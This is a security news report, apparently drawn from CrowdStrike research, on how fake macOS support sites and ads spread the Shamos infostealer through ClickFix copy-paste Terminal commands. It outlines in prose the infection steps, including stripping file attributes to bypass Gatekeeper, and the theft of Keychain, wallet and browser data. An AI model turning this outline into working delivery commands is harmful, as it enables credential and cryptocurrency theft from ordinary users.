Deceptive macOS support websites distribute the Shamos infostealer using the ClickFix method.

Cybercriminals are exploiting the technical issues faced by macOS users to infect their machines with the Shamos infostealer, as warned by CrowdStrike researchers. To circumvent macOS security features that would typically block such installations, these criminals employ a technique known as ClickFix, which relies on users executing malicious commands. Between June and August 2025, the attackers created fraudulent macOS help websites and manipulated Google Search to display ads directing users to these sites. The fraudulent websites, hosted on mac-safer[.]com and rescue-mac[.]com, provided misleading instructions that, rather than resolving users’ issues, prompted the installation of Shamos—a variant of the Atomic macOS infostealer—when users copied, pasted, and executed a specific one-line command in the Terminal app.

The malicious command downloads the Shamos Mach-O file into the /tmp/ directory, removes extended file attributes to bypass Gatekeeper checks, assigns executable permissions, and executes the stealer. Shamos then runs anti-VM commands to ensure it is not operating in a sandbox environment. The malware conducts host reconnaissance and data collection tasks, searching for cryptocurrency wallet files and sensitive credential files. It attempts to exfiltrate this data, including information from Keychain, AppleNotes, and browsers, using curl to send the data in a ZIP archive named out.zip.i2. Additionally, the malware downloads a spoofed Ledger Live wallet application and a botnet module, while also trying to create a Plist file for persistence. Researchers have identified another malvertising campaign delivering Shamos through a GitHub repository that falsely claims to provide the popular iTerm2 terminal emulator, with installation instructions that include the same malicious command. The ClickFix technique has gained popularity due to its effectiveness, which is attributed to convincing error messages, fake CAPTCHA prompts, and overly technical instructions that confuse average users. 

Categories: Cybersecurity Threats, Malware Delivery Techniques, Social Engineering Tactics 

Tags: Malware, macOS, Shamos, ClickFix, Cybercriminals, Infostealer, Social Engineering, Malvertising, Data Exfiltration, Terminal Commands